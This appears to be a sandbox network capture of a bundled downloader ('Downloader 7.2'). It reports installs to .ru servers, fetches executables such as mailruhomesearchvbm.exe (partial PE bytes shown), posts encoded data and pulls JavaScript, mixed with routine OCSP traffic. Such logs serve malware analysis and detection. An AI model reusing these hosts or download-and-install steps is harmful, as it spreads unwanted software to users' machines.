C.N..|.<..r...1..k..oz..0..,.......Z.sx.'.G6.W...6....p......e.....
|5.P?.[.M.V..G.........._#.....E..W..0...$G{k.w..u...........R><<< skipped >>>

GET /static/web/js/adptest/advertisement.js?85071e6d HTTP/1.1

Host: go.imgsmail.ru

Connection: keep-alive

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:33 GMT

Content-Type: application/x-javascript

Last-Modified: Wed, 18 Feb 2015 14:32:46 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Expires: Thu, 05 Mar 2015 09:35:33 GMT

Cache-Control: max-age=864000

Access-Control-Allow-Origin: *

Content-Encoding: gzip
9b..............R...b....v(\...ta..&..-.6\.ya....@..........v_l......{
a....;.j.S.r....@.@3`....b......6].....T...^.-}...".....[0YS.P]k......
.i.U()*M......H......0..HTTP/1.1 200 OK..Server: nginx..Date: Mon, 23 
Feb 2015 09:35:33 GMT..Content-Type: application/x-javascript..Last-Mo
dified: Wed, 18 Feb 2015 14:32:46 GMT..Transfer-Encoding: chunked..Con
nection: keep-alive..Expires: Thu, 05 Mar 2015 09:35:33 GMT..Cache-Con
trol: max-age=864000..Access-Control-Allow-Origin: *..Content-Encoding
: gzip..9b..............R...b....v(\...ta..&..-.6\.ya....@..........v_
l......{a....;.j.S.r....@.@3`....b......6].....T...^.-}...".....[0YS.P
]k.......i.U()*M......H......0......

GET /touch_install?name=homesearch.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=ff7d9019f9fb5697be04f7630fff268bf5dbad4a7293af5d273be3f397f08be4&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:32:17 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:32:17 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

HEAD /files/5/c86zwe6s7h00f6/Knig18679_Xim2.zip HTTP/1.1

User-Agent: Downloader 7.2

Host: 6.bezsms.org

Content-Length: 0

Cache-Control: no-cache


HTTP/1.1 404 Not Found

Server: nginx/1.0.15

Date: Mon, 23 Feb 2015 09:27:31 GMT

Content-Type: text/html; charset=iso-8859-1

Connection: keep-alive

HTTP/1.1 404 Not Found..Server: nginx/1.0.15..Date: Mon, 23 Feb 2015 0
9:27:31 GMT..Content-Type: text/html; charset=iso-8859-1..Connection: 
keep-alive......

GET /files/5/c86zwe6s7h00f6/Knig18679_Xim2.zip HTTP/1.1

User-Agent: Downloader 7.2

Host: 6.bezsms.org

Cache-Control: no-cache


HTTP/1.1 404 Not Found

Server: nginx/1.0.15

Date: Mon, 23 Feb 2015 09:27:38 GMT

Content-Type: text/html; charset=iso-8859-1

Connection: keep-alive

Content-Length: 317
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /fi
les/5/c86zwe6s7h00f6/Knig18679_Xim2.zip was not found on this server.&
lt;/p>.<hr>.<address>Apache/2.2.15 (CentOS) Server at 6
.bezsms.org Port 80</address>.</body></html>.
....


GET /files/5/c86zwe6s7h00f6/Knig18679_Xim2.zip HTTP/1.1

User-Agent: Downloader 7.2

Host: 6.bezsms.org

Cache-Control: no-cache


HTTP/1.1 404 Not Found

Server: nginx/1.0.15

Date: Mon, 23 Feb 2015 09:27:38 GMT

Content-Type: text/html; charset=iso-8859-1

Connection: keep-alive

Content-Length: 317
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /fi
les/5/c86zwe6s7h00f6/Knig18679_Xim2.zip was not found on this server.&
lt;/p>.<hr>.<address>Apache/2.2.15 (CentOS) Server at 6
.bezsms.org Port 80</address>.</body></html>.
....


GET /files/5/c86zwe6s7h00f6/Knig18679_Xim2.zip HTTP/1.1

User-Agent: Downloader 7.2

Host: 6.bezsms.org

Cache-Control: no-cache


HTTP/1.1 404 Not Found

Server: nginx/1.0.15

Date: Mon, 23 Feb 2015 09:27:39 GMT

Content-Type: text/html; charset=iso-8859-1

Connection: keep-alive

Content-Length: 317
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /fi
les/5/c86zwe6s7h00f6/Knig18679_Xim2.zip was not found on this server.&
lt;/p>.<hr>.<address>Apache/2.2.15 (CentOS) Server at 6
.bezsms.org Port 80</address>.</body></html>.HTTP/1.
1 404 Not Found..Server: nginx/1.0.15..Date: Mon, 23 Feb 2015 09:27:39
 GMT..Content-Type: text/html; charset=iso-8859-1..Connection: keep-al
ive..Content-Length: 317..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 
2.0//EN">.<html><head>.<title>404 Not Found</t
itle>.</head><body>.<h1>Not Found</h1>.<
p>The requested URL /files/5/c86zwe6s7h00f6/Knig18679_Xim2.zip was 
not found on this server.</p>.<hr>.<address>Apache/2
.2.15 (CentOS) Server at 6.bezsms.org Port 80</address>.</bod
y></html>...

GET /ca.cer HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: repository.certum.pl


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:36 GMT

Server: Apache

Last-Modified: Fri, 07 Mar 2014 10:05:14 GMT

ETag: "34231-310-63d6aa80"

Accept-Ranges: bytes

Content-Length: 784

Connection: close

Content-Type: text/plain; charset=UTF-8
0...0............ 0...*.H........0>1.0...U....PL1.0...U....Unizeto 
Sp. z o.o.1.0...U....Certum CA0...020611104639Z..270611104639Z0>1.0
...U....PL1.0...U....Unizeto Sp. z o.o.1.0...U....Certum CA0.."0...*.H
.............0.............O|.%..>O..o.js.[Q......\...u......#R...3
..-..v. 9....K...x.sC{.a..X..lf~...^Uc.......0h..<..n..Z.N4.6....P.
m.B......AK.jk...~b.g..&_.&..O..W(....E.n.%].n9.../.G.r...[..S?....V.n
..f.&...S.....O).B.^... ..h.......Fc..."....FY~.5,...].H3.T...o.......
.;.Y.......0.0...U.......0....0...*.H.......................D.l.9>.
.n..!w..w... A......c..7..v$...L.=.go-...e1p......`{mX..I.c2.k.:...;..
..Q....4.. ...`.'l2w...r....?..$B..W..&C.......T(>.?..M.j.:...;.#.c
.?..'y.LQ....].;..s.....nd.ZV....Lt..q;..G.io...^...|R......Yg...p...i
....@Hj.5.)f.!.,.`*..J@.k.$...,s..

GET /?from=dist_svz HTTP/1.1

Host: maps.yandex.ua

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Mon, 23 Feb 2015 09:35:38 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Vary: Accept-Encoding

Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private, proxy-revalidate

Expires: Mon, 23 Feb 2015 09:35:38 GMT

X-Frame-Options: DENY

Content-Encoding: gzip
3528.............}i..F.....0...n.<.f.R..,..dK.......I. @..C........
.9.v.wv...../o.,[cY........~...*.<.....X. .*.2 3  ..(......W..|V..=
..q.J.=...k=K...]....i^.g...9-..;=,..H...:.....N...X....I..y..3K....5l
G.[.........9..4.....5..zL.].r..EW..w.ek../k.g.mh..}H.9..XN.B.%v30...i
.P...gIp....k........~..8...J.N.N;....M ......^`i>.pvA. ..vD.'..8m.
..Y.$m.w5..:i8.y.k.}..#...;.........?x...........v...3.y..$.........A.
...y.........}i....w.../.T.._..@..;_..............;w.....c@...WW.._...
.....;..|....X..D...9.. };.(...P...{a......B...<H@...O.(..;...B....
;w..?.m.C.......x.SB........A.~..a.~.I..;.....w>.....O....oZL.AA.^.
>.N(.R_k.F.3........(.z..`....i.l.^.T*..../..r..}...e.....Y...-....
...V.....s[..^....R..z.4.f?g....c._njz..:.m..o.Z..u...~..l...f@..i..A.
.vS Td..,..K=.........D.Y..X...K.2..5.....I.....2.....V.P.)f.gW.U0G..3
o19..mPn.Tkz...lX......Vk ..#.....s.z.1.....i..(...l !.....rySC.../..W
n...Z...7/.u.......3F...L;X..J.l^Q.....L..Gwt.Hf^....p..Lp.%}.z}......
..?....4.r.16...W*/,.En.6p........!m@.RD/0{..ZZZ...2..G...........0.lW
..?HW.......P}...w'T\7}.K.......K.....4W..P.F..,....L.[...vcb......9.i
,iOohk....(..?W*.f.d.. .......K..Z.k2.`.u.....bq.7.r.t.Z..{l.U.v.-.So.
..=-.......r!j.....nq...b8z.......gYWs....Syn.Us0t,M.{....xYqW...''G.M
....f.`(:y....=.... U.v..#.IyMr..N......!.#8..[1[R...EZZ......u%...G..
:..9....:lDj...2SF}.J..ta..i......<.-..n....ZE$.5.._M..1.....7V....
Gb]xJX.&b]|JX.'b]...@..F L.M.&r=.%SG?v.........6o5.....Vo.|...7[.....]
..B....5.._........{.z...<^...mG.c..h..r.=).k.^..z8...d!7iR2.8'<<< skipped >>>

GET /update/2/version.txt?type=prog_set&GUID={719968E8-AEBE-49A6-B040-FB3879941DE0}&rfr=blackbear1&osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=11&tool=sputnik&target=op_dial&prog=mail&target_ver=27.0.1689.69 HTTP/1.1

Host: mrds.mail.ru

Accept: */*

User-Agent: FULLSTUFF

Connection: close


HTTP/1.1 204 No Content

Server: nginx

Date: Mon, 23 Feb 2015 09:35:27 GMT

Connection: close

GET /get_json?stb=1&did=1497824015&ext_partner_id=&file_id=32888998&rnd=399f10466aadb4ab46aee8d444f5554534411947cf39dabc663334b4ef7e4f1d HTTP/1.1

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:31:05 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:31:05 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

ETag: c0fnm3qk7v54eaf35925c9b616031868
a22....`..C._N...T..`D*._...L..<.:.V.......#F.........V.),.p.Lr.gg^
.....44....q..:.. ....:]_3.*.......X.;...=.....=.....VDV.!.)2...i4Y...
5mR.&.8...Y/..?@R...k.5..u......}>..n....K.....?..l....9J@......b.m
./YP.u..I..\..s|A..usb5/..'..vRl...S.J9........w8...J..t7..`...<W.f
..o ..Nq1. T ...C3....p........U!....aF......O.#.=... .E<"..L...x. 
..o.N._.hq...h.qN..FF...{.=Oyp.....a...2...."X..M..v/......j$.5..du&$.
[..d$~...su...Q.@.....9B.H....90........cJ....J..b5.....vu.m....m..|-&
gt;..s.5...e..K.t7...e.....?...w.......S..1.`E".......z_...(.D.. f.oh 
*....a....,....#r.!.....r..!..U....^.z...CLz.rh.:]..f......3z..E..T.V4
...M.4....#.....rri.^g.....M.#..-$..........du&..>-.5s.....m...t.K.
..tn...ce\....$......Z.......&.b5..IeAm..6...u..I&G6.5....J...u..90...
..%..S./K.}......'...:].....Wh.].z<...qTf..<..]..!:.Tg.y...,....
)...O.V.^.p.i.^g2;.p).. ....`...OW ...O..h.....]._E..D!...=...y^....4E
.4.{..gV)...;...A...Y-.....6.>..|.bb.6..IR....>....}.%..9B.%....
.........j>......R[.........k$.A.....|->G.&...[..0...l}.\.c?t..9
Q..S0.....eA....1.]....N.1.CE<.....(.<......T...i......^.Mo..y..
o:.)..);... .ppq.zN ..C..EC .....<.:]....q.a<....r..M2....^.....
...{.Dgr4.........>.m...P>...db.}.5..~.......>.........cl$.@.
?.........}......9..J\..&./I8...6..v..&.$G...s..KR....0.t7H...Zt?..n..
'.....\J.v.......TqW...fTx...(...f.L...3.....D!...4. ..f1:....T.. .f..
.x1..x......<...E.#...fh ."q.o.C(].<..#...r{.....r..U).y#;..iF^!
.O=......t.$66-.8m.s.5G.8[bP.jY..6.[..%.%.....nkk.G.6..Pj$s|G5..5-<<< skipped >>>

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCASLFcOoMN4Y HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com


HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Fri, 20 Feb 2015 18:17:20 GMT

Expires: Tue, 24 Feb 2015 18:17:20 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Age: 227667

Alternate-Protocol: 80:quic,p=0.08

Cache-Control: public, max-age=345600

0..........0..... .....0......0...0......J......h.v....b..Z./..2015022
0130248Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
......0......20150220130248Z....20150227130248Z0...*.H...............a
2n.i.0..A.-\..m.Y...k~..c2......z..p...u&.Z.A.D..y.5A.(..,.....i.6..tF
..}k.!,.,w)[j....2.d .Z.6x .,..8..M...rv."3?.ku..........aU.....7.2.Y.
6.\.[.....r.L..M/.|...6.n._...........I..s..c.....l.v.dX..zh.[.. 4.5..
..YR.... O..|....!K.......\....zmi.W..y..6.HTTP/1.1 200 OK..Content-Ty
pe: application/ocsp-response..Date: Fri, 20 Feb 2015 18:17:20 GMT..Ex
pires: Tue, 24 Feb 2015 18:17:20 GMT..Server: ocsp_responder..Content-
Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORI
GIN..Age: 227667..Alternate-Protocol: 80:quic,p=0.08..Cache-Control: p
ublic, max-age=345600..0..........0..... .....0......0...0......J.....
.h.v....b..Z./..20150220130248Z0k0i0A0... ..........j.....p.I.#z...(~d
..J......h.v....b..Z./.......0......20150220130248Z....20150227130248Z
0...*.H...............a2n.i.0..A.-\..m.Y...k~..c2......z..p...u&.Z.A.D
..y.5A.(..,.....i.6..tF..}k.!,.,w)[j....2.d .Z.6x .,..8..M...rv."3?.ku
..........aU.....7.2.Y.6.\.[.....r.L..M/.|...6.n._...........I..s..c..
...l.v.dX..zh.[.. 4.5....YR.... O..|....!K.......\....zmi.W..y..6...

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.digicert.com


HTTP/1.1 200 OK

Accept-Ranges: bytes

Cache-Control: max-age=516566

Content-Type: application/ocsp-response

Date: Mon, 23 Feb 2015 09:31:21 GMT

Etag: "54ead30a-1d7"

Expires: Sun, 01 Mar 2015 21:31:21 GMT

Last-Modified: Mon, 23 Feb 2015 07:13:14 GMT

Server: ECS (ams/49A8)

X-Cache: HIT

Content-Length: 471

0..........0..... .....0......0...0.......>.i...G...&....cd ...2015
0222200000Z0s0q0I0... ............(..A...B..G@B.X....>.i...G...&...
.cd ........\..m. B.]......20150222200000Z....20150301200000Z0...*.H..
...........${LjP WI..J.....f..*.1..z..Z..%..zw.\..".o;8!..,....5...[..
.r..Ys...:..p.ZW......k.. bx.......X...........Q..z.........Z=B....N[i
...w......;......J%.b...(... 6'b_../.*.eJ.B.1... N.,..TN7.c./......!..
G.1....0.G...b.q......b......2.....3...KV.....u.$L#...D......

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTPJvUY+sl+j4yzQuAcL2oQno5fCgQUUWj/kK8CB3U8zNllZGKiErhZcjsCEArKdNViqZvRTsj6pSQqLDU= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.digicert.com


HTTP/1.1 200 OK

Accept-Ranges: bytes

Cache-Control: max-age=514060

Content-Type: application/ocsp-response

Date: Mon, 23 Feb 2015 09:31:21 GMT

Etag: "54ead8a0-1d7"

Expires: Sun, 01 Mar 2015 21:31:21 GMT

Last-Modified: Mon, 23 Feb 2015 07:37:04 GMT

Server: ECS (ams/49BB)

X-Cache: HIT

Content-Length: 471
0..........0..... .....0......0...0......Qh.....u<..edb...Yr;..2015
0223072200Z0s0q0I0... .........&....~...B../j..._...Qh.....u<..edb.
..Yr;....t.b...N...$*,5....20150223072200Z....20150302073700Z0...*.H..
.............p,3..'...m.p..!.HlA..<...\..D.q...7....$h.{vj.........
.......}..h...m..W...D]..V5... ...%]8u........Gt.I.)Q.n......G{..O..1.
..9...K.q...8QQQ.u..<.~..#j.....o,j.@...i.....~.#..}..Am.*^...q,..L
...{YP..O..\...R.\|>..<$4..z.D.u)..bc.....oi.}D.......q.=fF....H
TTP/1.1 200 OK..Accept-Ranges: bytes..Cache-Control: max-age=514060..C
ontent-Type: application/ocsp-response..Date: Mon, 23 Feb 2015 09:31:2
1 GMT..Etag: "54ead8a0-1d7"..Expires: Sun, 01 Mar 2015 21:31:21 GMT..L
ast-Modified: Mon, 23 Feb 2015 07:37:04 GMT..Server: ECS (ams/49BB)..X
-Cache: HIT..Content-Length: 471..0..........0..... .....0......0...0.
.....Qh.....u<..edb...Yr;..20150223072200Z0s0q0I0... .........&....
~...B../j..._...Qh.....u<..edb...Yr;....t.b...N...$*,5....201502230
72200Z....20150302073700Z0...*.H...............p,3..'...m.p..!.HlA..&l
t;...\..D.q...7....$h.{vj................}..h...m..W...D]..V5... ...%]
8u........Gt.I.)Q.n......G{..O..1...9...K.q...8QQQ.u..<.~..#j.....o
,j.@...i.....~.#..}..Am.*^...q,..L...{YP..O..\...R.\|>..<$4..z.D
.u)..bc.....oi.}D.......q.=fF......<<< skipped >>>

POST /replace HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Host: fesity.ru

Content-Length: 43

Connection: Keep-Alive

Cache-Control: no-cache

url=https://mail.ru/&version=1.2.15
HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:37 GMT

Content-Type: text/javascript; charset=utf-8

Transfer-Encoding: chunked

Connection: close

Vary: Accept-Encoding

Status: 200 OK

X-Frame-Options: SAMEORIGIN

X-XSS-Protection: 1; mode=block

X-Content-Type-Options: nosniff

Cache-Control: max-age=0, private, must-revalidate

Set-Cookie: request_method=POST; path=/

Set-Cookie: uid=1424684137815114;1.2.15; path=/; expires=Tue, 23 Feb 2016 09:35:37 -0000

Set-Cookie: srra=; path=/

Set-Cookie: cspc=2015-02-23 10:35:37 +0100; path=/

X-Request-Id: c93ab57e-5426-4e70-aee5-e2055650afcb

X-Runtime: 0.002685

Cache-Control: no-cache

Content-Encoding: gzip
be............e.... ...W.^..@Y.D..EPPw....sLg..|.0......>......CCy[
.......`.@HI.........`w....K.D.....9. D...&.....E1..Op6.]..R.e..*..~..
.&..........a.MQ......{....7.lx.$.OA.{}..{.......v.OF......0..

GET /mailruhomesearchvbm.exe?rfr=blackbear1 HTTP/1.1

User-Agent: Downloader 7.2

Host: sputnikmailru.cdnmail.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:32:17 GMT

Content-Type: application/octet-stream

Content-Length: 3458280

Connection: keep-alive

Last-Modified: Wed, 21 Jan 2015 10:37:36 GMT

ETag: "54bf8170-34c4e8"

Accept-Ranges: bytes

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......Y..}........
....[...9...[.@.....[.A.A.............#.?.....@.......3...............
A.E.....{.......7.......~.....Rich....................PE..L......T....
..............#..X................#...@..........................@5...
....4...@...................................*.@..... ...............4.
.....p3...............................(......-(.@.............#.......
.......................text...F.#.......#................. ..`.rdata..
......#.......#.............@..@.data.........*.......*.............@.
...tls.......... ......J .............@....rsrc......... ......L .....
........@..@.reloc.......p3.......2.............@..B..................
......................................................................
......................................................................
......................................................................
.............................................`.....,..V.t$p..u..Prk..D
$.P..........u.^..`..L$l.T$hQR.D$.P......L$.QV.c....T$.j`R..........^.
.`..............V.t$.jpj.V..)............F...|6.F...p0.F.9Y...F.1....F
...Xh.F....d.F..O...Fl.........^..........V.t$.jpj.V.!).......g..j.F..
.g..F.r.n<.F.:.O..F..R.Q.F..h...F......F....[.Fl ........^.........
..T$.UW.|$...........V.t$..F ...;.s..F$......F$.FhS.N ..tj.n(..@s"..8.
.@s.WR..U.-"......~h[^_.....]..@... .SR..(R.."..j.UV......D$0j@...j.U.
L$< ..Fh.....4(...l$<..$.......v.SUV.\........... ...t.W.~hU

<<< skipped >>>

HEAD /go_chxtn4.7z HTTP/1.1

Host: xtnmailru.cdnmail.ru

Connection: close


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:32:19 GMT

Content-Type: application/x-7z-compressed

Content-Length: 31291

Connection: close

Last-Modified: Wed, 17 Dec 2014 16:01:56 GMT

ETag: "5491a8f4-7a3b"

Accept-Ranges: bytes

HEAD /?prod=shortcutmaker&version=1.0.0.113&action=set_shortcut_start&guid=BF8501D34E71C08CCE258C678D1C6C1C&mid=BF8501D34E71C08CCE258C678D1C6C1C&os=6.1&bit=64&sig=2f30dcb5fee49f267a17c01eac0c5821&guid=140C363D39D3429482E45C1A8EB2CC99 HTTP/1.1

Host: gstinfo.ru

Accept: */*


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:36:13 GMT

Content-Type: : text/plain

Content-Length: 3

Connection: keep-alive

POST /software_install?hetag=bba9e197f9f68f6e3b7c53519e87cb75&hash=HASH&file_id=32888998&did=1497824015&ext_partner_id=&goinf_plugin_cis=1 HTTP/1.1

Content-Type: multipart/form-data; boundary=kgwkztYvtJ4Ag81m9vVCVvvFUIeUkB

User-Agent: Downloader 7.2

Host: forces.vseturbo.ru

Content-Length: 209

Cache-Control: no-cache

--kgwkztYvtJ4Ag81m9vVCVvvFUIeUkB

Content-Disposition: form-data; name="data"

g?..t.S<.Y
..S!.E.|Mz....}..K...AA>D..y_.....A_.0m5.g3.8;.5;...|..E......|....V!.$.!$.q..

--kgwkztYvtJ4Ag81m9vVCVvvFUIeUkB--


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:29 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:35:29 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.godaddy.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:38 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=115382, public, no-transform, must-revalidate

Last-Modified: Mon, 23 Feb 2015 07:19:53 GMT

Expires: Tue, 24 Feb 2015 19:19:53 GMT

ETag: "73613054ed4acfc67b83f9ce06a2f4b1b0d3dec9"

Content-Length: 1816

Connection: close

Content-Type: application/ocsp-response
0..........0..... .....0......0...0..-...0..1.0...U....US1.0...U....Ar
izona1.0...U....Scottsdale1.0...U....GoDaddy.com, LLC1-0 ..U...$http:/
/certs.godaddy.com/repository/1.0,..U...%Go Daddy Class 2 Validation A
uthority..20150223071953Z0f0d0<0... ......... ......]..J^.y_..F<
........L.q.a.=....j...........20150223071953Z....20150224191953Z0...*
.H.............!>c.`T...eoK....W..f1...|.C.N^.N.....1.J$.e...'.....
O.....fA.'#.0....oZ..h...5..s....S.....h"..;7...".3.U.....9....KK..p.r
m..-._.N(sp.|g%........x]...<L...U...(.>7.e...........d(...y....
T..o...)..&&#./$.9Q..D.....^...4j.}../.f.A..g..87.....QF..4yV.H|..u/.(
....0...0...0.......... .0...*.H........0c1.0...U....US1!0...U....The 
Go Daddy Group, Inc.110/..U...(Go Daddy Class 2 Certification Authorit
y0...140401070000Z..150401070000Z0..1.0...U....US1.0...U....Arizona1.0
...U....Scottsdale1.0...U....GoDaddy.com, LLC1-0 ..U...$hXXp://certs.g
odaddy.com/repository/1.0,..U...%Go Daddy Class 2 Validation Authority
0.."0...*.H.............0..........J<V_....7p\.....^.'...Y.C.BPX..$
.?.......#..S....'=.....D..h-.n.....#....n..M...c..:E.x..Q.&..2w..{..o
q...y.......K..@bH....7&.G.U.....G.{.Cj....S.|.).(....... .....}4.[r..
......N.........1B.zp..L.....Eq.G$a.A...9..... /.B.....G..e....7.\=QcN
......Xw..4].........0...0...U.......0.0...U...........0...U.%..0... .
........ .......0...U.......dK...Z5...NP.\.S.~.0...U.#..0.........L.q.
a.=....j..0... .....0......02..U... 0)0'.%.#.!hXXp://crl.godaddy.com/g
droot.crl0M..U. .F0D0B..`.H...m....0301.. ........%hXXps://certs.g<<< skipped >>>

GET /webservice/v1/symbols/allcurrencies/quote?format=json&random=0.9386969780291706 HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Host: finance.yahoo.com

Connection: Keep-Alive

Cookie: B=52qa5ah9dvsod&b=3&s=ur; RMBX=52qa5ah9dvsod&b=3&s=ur&t=33


HTTP/1.1 406 Not Acceptable

Date: Mon, 23 Feb 2015 09:35:34 GMT

content-length: 21

content-type: text/plain; charset=utf-8

Cache-Control: max-age=0, private

Expires: -1

Vary: X-Ssl

Age: 0

Via: http/1.1 yts284.global.media.ir2.yahoo.com (ApacheTrafficServer [cMsSf ]), http/1.1 r17.ycpi.ir2.yahoo.net (ApacheTrafficServer [cMsSf ])

Server: ATS

Connection: keep-alive

Not a valid parameterHTTP/1.1 406 Not Acceptable..Date: Mon, 23 Feb 20
15 09:35:34 GMT..content-length: 21..content-type: text/plain; charset
=utf-8..Cache-Control: max-age=0, private..Expires: -1..Vary: X-Ssl..A
ge: 0..Via: http/1.1 yts284.global.media.ir2.yahoo.com (ApacheTrafficS
erver [cMsSf ]), http/1.1 r17.ycpi.ir2.yahoo.net (ApacheTrafficServer 
[cMsSf ])..Server: ATS..Connection: keep-alive..Not a valid parameter.
.

GET /rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAS9O4UUM HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.globalsign.com


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:36 GMT

Content-Type: application/ocsp-response

Content-Length: 1508

Connection: keep-alive

Set-Cookie: __cfduid=d4439c0f43d13ed6beb573224a3ffae2f1424684136; expires=Tue, 23-Feb-16 09:35:36 GMT; path=/; domain=.globalsign.com; HttpOnly

Last-Modified: Mon, 23 Feb 2015 05:29:50 GMT

X-Powered-By: Servlet/3.0; JBossAS-6

ETag: 157f3b8b4aca450bb2b3b23260a06fd3ceed26cd

Expires: Tue, 24 Feb 2015 05:29:50 GMT

Cache-Control: public,no-transform,must-revalidate,max-age=86399

CF-Cache-Status: HIT

Server: cloudflare-nginx

CF-RAY: 1bd26f2ca6fa147f-AMS
0..........0..... .....0......0...0......67.....)...u/..n.%.q..2015022
3052950Z0n0l0D0... .........W......#....*..2..1..`{f.E....P/}..4....K.
......./N.E.....20150223052950Z....20150224052950Z0...*.H...........n?
..\ ...I....'.;8..b."m....5s....I-.....T.H..(V............LK...GS..$..
...E...!./.=.h.f.N...q.mg.;.....l}.3u.^=....W.N.\..W.....d.@..7....L..
W..............oU.N...a2]....R.l.....OL.......U.....\....Do9&.}......(
Q.....|F.........L...4.h..E.....R|.B.sy--i......0...0...0.............
...E..W.0...*.H........0W1.0...U....BE1.0...U....GlobalSign nv-sa1.0..
.U....Root CA1.0...U....GlobalSign Root CA0...140505110000Z..150505110
000Z0Y1.0...U....BE1.0...U....GlobalSign nv-sa1/0-..U...&GlobalSign OC
SP for Root R1 - Branch 20.."0...*.H.............0..........t. ..goZ..
..%m......f.....a~...*.9......\r..N...^....P.N._YK....q.!sT....Ip.jCm.
.3*...je...H.M.|.C2.:........`Q...6..MP......B..|.S...G|2..v...g1i`.j.
.T...-.(.........U".......,N.'o...r.c.......;."Pw8X...G...4.........W.
